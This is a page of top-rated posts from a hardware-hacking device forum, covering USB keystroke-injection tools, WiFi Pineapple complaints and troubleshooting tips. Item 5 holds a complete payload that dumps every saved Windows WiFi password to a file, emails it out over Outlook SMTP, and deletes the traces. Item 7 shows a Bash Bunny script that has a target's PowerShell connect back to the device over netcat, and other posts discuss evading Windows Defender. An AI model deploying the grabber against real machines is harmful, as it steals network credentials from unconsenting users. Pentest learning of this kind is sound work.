Popular Content

Showing content with the highest reputation since 07/01/2020 in Posts

  1. 1 point
    Hi to all, I've bought this device for pentesting and learning. I'm quite a newbie about that kind of hardware, but it seems that the actual Windows Defender of 1903 Windows Edition prevents every kind of payload from working. Is that true? I've tried quite 50 payloads. With a system with Defender on, it does not start at all. I've also flashed the Ducky with Twin Ducky... it seems that is worse: it sometimes takes time to analyze the USB and sometimes finds the inject.bin and removes it. All payloads with "gmail send" are not working because of authentication, every payload with password grabbing is not working because Nirsoft removed command line text export for security purposes... so this is a useless expensive USB key and nothing more? Now, my question: is it really possible, outside the Mister Robot series, to use that device in a real environment? Because I've invested about 20 hours in it and I can't find a way to make it have a real use if the system is protected, but I've spent about 90$ in my country for buying it. If someone has been able to make it work I will be glad to know. Thank you.
  2. 1 point
    A workaround for this is to swap the order of the lines in the language file. The Q and QUACK scripts seem to take the last instance in the file and 'quack' out that key code. The files are in the languages folder on the udisk. Try using the attached file instead to see if it helps. Make sure to unplug and re-connect the KeyCroc to enable the changes. us.json
  3. 1 point
    I got it to sort-of work by adding this to /etc/dnsmasq.conf:

        dhcp-option-force=224,my_payload_string

    Very strange but good enough for now. Thanks!
  4. 1 point
    I am sorry, I see what you're saying. You're talking about the \ symbol escape. Yes, you're right, you don't need them there. name=\"%i\" key=clear - should be name="%i" key=clear. Everything passed to QUACK STRING is interpreted by bash, so you may need to escape some special characters. I just started adding \ escapes to the payload to make it work and once it worked I left it alone. BIG thanks Dice, I will update.
  5. 1 point
    WiFi password Grabber (Windows 10)

    This script will grab not just the current SSID and password your computer is connecting to but every single SSID and password you have previously connected/saved on your computer. And it works even if the WiFi name contains special characters (such as a smiley face) or spaces. I'm not using gmail here because Google is pretty restrictive when it comes to 3rd party app authentication (let me know if it works with other mail servers such as yahoo, zoho, etc.). You might want to adjust the DELAY depending on the system you are running, e.g. set a higher delay time if your system is slow.

    Change the following things:
    ACCOUNT: Your hotmail/outlook account
    PASSWORD: Your hotmail/outlook password
    RECEIVER: The email you want to send the content of Log.txt to

    I have tested this myself and it works. Sometimes you may need to run it 2 or 3 times, and you can change the MATCH to what you want.

        MATCH wifipass
        QUACK DELAY 1000
        QUACK REM --> Minimize all windows
        QUACK WINDOWS d
        QUACK REM --> Open cmd
        QUACK WINDOWS r
        QUACK DELAY 1000
        QUACK STRING "cmd"
        QUACK ENTER
        QUACK DELAY 1000
        QUACK REM --> Get all SSID
        QUACK STRING "cd %USERPROFILE% & netsh wlan show profiles | findstr \"All\" > a.txt"
        QUACK ENTER
        QUACK REM --> Create a filter.bat to get all the profile names
        QUACK STRING "echo setlocal enabledelayedexpansion^"
        QUACK ENTER
        QUACK ENTER
        QUACK STRING "for /f \"tokens=5*\" %%i in (a.txt) do (^"
        QUACK ENTER
        QUACK ENTER
        QUACK STRING "set val=%%i %%j^"
        QUACK ENTER
        QUACK ENTER
        QUACK STRING "if \"!val:~-1!\" == \" \" set val=!val:~0,-1!^"
        QUACK ENTER
        QUACK ENTER
        QUACK STRING "echo !val!^>^>b.txt) > filter.bat"
        QUACK ENTER
        QUACK REM --> Run filter.bat and save all profile names in b.txt
        QUACK STRING "filter.bat"
        QUACK DELAY 1000
        QUACK ENTER
        QUACK REM --> Save all the good stuff in Log.txt and delete the other garbage files
        QUACK STRING "(for /f \"tokens=*\" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:\"Key Content\" & echo.) > Log.txt"
        QUACK ENTER
        QUACK DELAY 1000
        QUACK STRING "del a.txt b.txt filter.bat"
        QUACK ENTER
        QUACK REM --> Mail Log.txt
        QUACK STRING "powershell"
        QUACK ENTER
        QUACK DELAY 1000
        QUACK STRING "\$SMTPServer = 'smtp-mail.outlook.com'"
        QUACK ENTER
        QUACK STRING "\$SMTPInfo = New-Object Net.Mail.SmtpClient(\$SmtpServer, 587)"
        QUACK ENTER
        QUACK STRING "\$SMTPInfo.EnableSSL = \$true"
        QUACK ENTER
        QUACK STRING "\$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(\"your email here\", \"password here\")"
        QUACK ENTER
        QUACK STRING "\$ReportEmail = New-Object System.Net.Mail.MailMessage"
        QUACK ENTER
        QUACK STRING "\$ReportEmail.From = 'your email here'"
        QUACK ENTER
        QUACK STRING "\$ReportEmail.To.Add('add email to send to here')"
        QUACK ENTER
        QUACK STRING "\$ReportEmail.Subject = 'WiFi key grabber'"
        QUACK ENTER
        QUACK STRING "\$ReportEmail.Body = (Get-Content Log.txt | out-string)"
        QUACK ENTER
        QUACK STRING "\$SMTPInfo.Send(\$ReportEmail)"
        QUACK ENTER
        QUACK DELAY 3000
        QUACK STRING "exit"
        QUACK ENTER
        QUACK DELAY 1000
        QUACK REM --> Delete Log.txt and exit
        QUACK STRING "del Log.txt & exit"
        QUACK ENTER

    BIG THANKS TO Darren Kitchen, RootJunky and Cribbit for all the help

    window-wifi-passwd.txt
  6. 1 point
    BIG BIG THANKS TO Cribbit and RootJunky. Yes, my Num Lock was on 😕 Payloads are working, my bad. THANKS AGAIN GUYS
  7. 1 point
    I don't know if this will be any use to anyone, but I created a PoC to demonstrate sending the status/progress of a PowerShell script to the Bunny. The PS only sends the numbers 1, 2, (3 or 4) & 5 with sleeps in between. And the Bunny just changes its LED depending on the number. When it gets a 5 it quacks the command to close the PowerShell window.

        #!/bin/bash
        trap "kill 0" EXIT
        LED SETUP
        ATTACKMODE RNDIS_ETHERNET HID
        GET SWITCH_POSITION
        GET HOST_IP
        cd /root/udisk/payloads/$SWITCH_POSITION/
        FILE=data.txt
        # Clear old commands
        if [ -f "$FILE" ]; then
            cat /dev/null > "$FILE"
        fi
        LED SPECIAL
        # Set up an echo command to write to file.
        # using echo as nc only finishes writing when the connection closes.
        CMD="while true; do read i && echo \$i >> $FILE ; done"
        # set nc to run in its own process
        nc -lvn -p 8080 -c "$CMD" &
        # give nc time to start
        sleep 1
        # set the last command to empty
        last="";
        LED ATTACK
        Q DELAY 200
        RUN WIN "powershell"
        Q DELAY 100
        # Create a connect object
        Q STRING "\$client = New-Object System.Net.Sockets.TcpClient;"
        Q DELAY 100
        # set the host and port and connect to nc
        Q STRING "\$client.Connect(\"$HOST_IP\",8080);"
        Q DELAY 100
        # create a stream for that connection
        Q STRING "\$stream = new-object System.IO.StreamWriter \$client.GetStream();"
        Q DELAY 100
        # get powershell to sleep
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 100
        # write the 1 to the stream
        Q STRING "\$stream.WriteLine(\"1\");"
        Q DELAY 100
        # push this over to nc
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 100
        Q STRING "\$stream.WriteLine(\"2\");"
        Q DELAY 100
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 200
        # Send a 3 or 4
        Q STRING "\$stream.WriteLine((3+(Get-Random -Maximum 2)).ToString());"
        Q DELAY 100
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 100
        Q STRING "\$stream.WriteLine(\"5\");"
        Q DELAY 100
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        # Close connection
        Q STRING "\$client.Close();"
        Q DELAY 100
        Q ENTER
        LED SPECIAL
        # forever loop
        while :
        do
            # get the last line of the file removing line feeds (10) and carriage returns (13)
            curr=$(tail -1 "$FILE" | tr -d '\r\n')
            #curr=$(tail -1 "$FILE" | sed -e 's/[\r\n]//g')
            # see if the last command is different to the curr command
            if [ "$last" != "$curr" ] ; then
                # set the last to the current command
                last="$curr"
                # go to the section based on the command
                # most just change led color and rate of flashing.
                case $curr in
                    1) LED STAGE1;;
                    2) LED SPECIAL2;;
                    3) LED STAGE3;;
                    4) LED STAGE4;;
                    5) LED SPECIAL5
                       Q DELAY 100
                       # close powershell
                       Q STRING "exit"
                       Q ENTER
                       break;;
                esac
            fi
        done
        LED FINISH
        sleep 1

    The PowerShell is all on different lines just to make it easy to read. As I said, I don't know if this will be of any use to anyone, but you never know, it may spark an idea in someone else.
  8. 1 point
    https://forums.hak5.org/topic/28600-do-not-post-wifi-pineapple-related-questions-here/
  9. 1 point
    Not in my experience; you will do a firmware flashing as part of the setup.
  10. 1 point
    And I have a Tetra too; you are right, this is sh*t.
  11. 1 point
    What do you think about bashbunny? Is it better than rubber ducky? I have bashbunny and I think about buying rubber ducky.
  12. 1 point
    I think it's time you start taking dumps to see where it's getting held up. I only work with AWS/GCP so my expertise ends here. Sorry!
  13. 1 point
    Hey Shanimal, So Google Cloud Platform (GCP) uses two sets of firewalls by default: the VM's firewall, and the Virtual Private Cloud (VPC) firewall. In order to host Cloud C2 you will need to adjust your VPC firewall rules through the VPC > Firewall tool. You should have something set like this below... You will create a network tag to apply to the VM of your choosing. Add/remove ports as needed. If you want some hands-on assistance just send me a message.
  14. 1 point
    I had a Tetra for a while and could never get it to work reliably; the most it did was troll people with fake SSIDs. I have bought most of this stuff as my job paid for it, but the only slightly useful thing out of all Hak5 is the Rubber Ducky.
  15. 1 point
    Sweet! Nice work SelfTaughtDude!
  16. 1 point
    @Darren Kitchen I think that you need to look at this.
  17. 1 point
    Same experience here on the functionality of the product. Such a shame. Product testing, UAT etc. seem to have been left out of the development cycle. My Tetra is just an ornament to what might have been. On my third Pineapple product, none works as advertised. My $45 deauther in wrist watch form is far better to deauth, like it does it when I set it to do so 😉 Radical huh.
  18. 1 point
    I agree with all of you here. This product is much over hyped and it is frustrating to say the least. I bought this a few days back and I wish I had read all the feedback before I purchased it. I wish I had read this blog post about how the WiFi Pineapple is a total sham https://medium.com/@dephekt/a-review-of-the-pineapple-tetra-and-hak5-7198a98d8990 I hope the community realizes that Hak5 is just swindling people out of their money with this bullshit product. I paid for this out of my own pocket and I can't use this on any engagement. Feeling dejected and frustrated. Shame on you Hak5 for this lousy WiFi Pineapple Tetra product.
  19. 1 point
    Exactly same sentiment here. Spent $200 on something that won't work. (In my case, it's stuck on "...still booting" screen with any SSH connection refused). My first thought was "Okay, I'll chance another $200 if they won't help." But hell, seeing all these problems with no resolution -- another $200 would be a guaranteed waste.
  20. 1 point
    I hear you. Having fun with this useless device myself for the last 2 days. I'm experiencing the exact same issues and intermittently being locked out from connecting via management or the Pineapple AP. My 2 laptops now report "unrecognized" USB device when connected via the Y cable. This worked just fine only yesterday. No luck connecting via the Ethernet port either. The Tetra is a very unstable half-baked device. I've just requested a return/refund. Let's see what I get in response.
  21. 1 point
    Are you using Pineapple or straight Kali Linux?
  22. 1 point
    After upgrading the Pineapple Nano to version 2.7.0, the SD card (SanDisk Ultra 64GB microSDXC) is not mounted automatically. I can format the SD card using the GUI and it is visible, but I cannot install modules on it. Can I count on help in this matter?
  23. 1 point
    Great to see someone encountering a problem and using their ability to research and learn to solve it!!
  24. 1 point
    Please disregard, I have gotten it working after a firmware recovery and setting it up on a different host. For whatever reason it didn't like my Kubuntu machine.
  25. 1 point
    https://forums.hak5.org/forum/64-wifi-pineapple/ Every item has its own section of the forums.
  26. 1 point
    Yeah, there is no way I would take this into an engagement. I REALLY want the Pineapple to work, and I really wish it would. But it can't do 50% of the things it is supposed to out of the box, and I am not talking about 3rd party modules. The bread and butter of what the Pineapple should do is: 1. Enumerate APs and clients associated to those APs 2. Capture and broadcast the SSIDs of the APs it has discovered 3. Deauth clients in order to get them to connect to the Pineapple's rogue SSIDs. It does point 1 perfectly. Points 2 and 3, not so much. 2. It can't even properly take an SSID and load it into the pool without corrupting the name. This is just poor coding. 3. It cannot deauth anything. I mean nothing. I made a small deauther using a Nodemcu Amica, and it works better than the Pineapple, and it didn't cost 200USD. I own several Rubber Duckies and those are excellent pentesting tools, so long as you write your scripts and customise your attacks depending on your target. I cannot say the same for the Pineapple. Much hype, little delivery. It's actually disappointing that Darren refuses to acknowledge this problem.
  27. 1 point
    Most likely you are not close enough or have the strongest signal for a successful deauth between the target AP and the client device.
  28. 1 point
  29. 1 point
    You can't really answer Q2 without answering Q1, since you don't know what penetration methods can be used. You just threw out some tech jargon and common tools, kind of a "let's see what sticks" approach. And it sounds like you have no ideas for Q1, so why should you get this job? I would suggest you brush up on penetration techniques, specifically related to Windows and Active Directory. The following Google search yielded some really interesting articles that seem pertinent to what you are looking for: https://www.google.com/search?q=pentest+find+user+machine+from+employee+name&oq=pentest+find+user+machine+from+employee+name&aqs=chrome..69i57j33.9488j1j7&sourceid=chrome&ie=UTF-8 I especially enjoyed the article from https://hausec.com, which walks you through the process from the beginning. I'm not going to give you direct answers, since that would make me more qualified for this job than you. I also don't claim to have all the answers, but I'm not the one interviewing for an infosec job, as much as I would love a career change. I wish you luck on your job search and I hope you can gain the knowledge you need to do your job well and impress the interviewers.
  30. 1 point
    Sorry... there must be a kind of misunderstanding. I'm telling you that if you plug the Ducky into a Windows 10 actual environment, this environment doesn't permit the launch of the injection file... you're telling me that I have to improve. 🙂 If it isn't possible to launch a file from a USB keyboard emulator like the Rubber Ducky, the device is useless and, as you rightly said, good only for online demos and for selling it. The thing that hurts me is that it is still sold on Amazon and on the HAK5 site when it's clear that today you can't use it in a real environment. If you tell me that the Bunny works maybe I can try... but I doubt that you can bypass a Windows machine with an antivirus with full modules enabled. Have you tried? If it can't bypass it, that will also turn that hardware into a useless one. I'm talking about Windows because 95% of the PCs of the world are Windows based. Thank you very much anyway for your support, nice to meet you.
  31. 1 point
    Your best tool for security is yourself...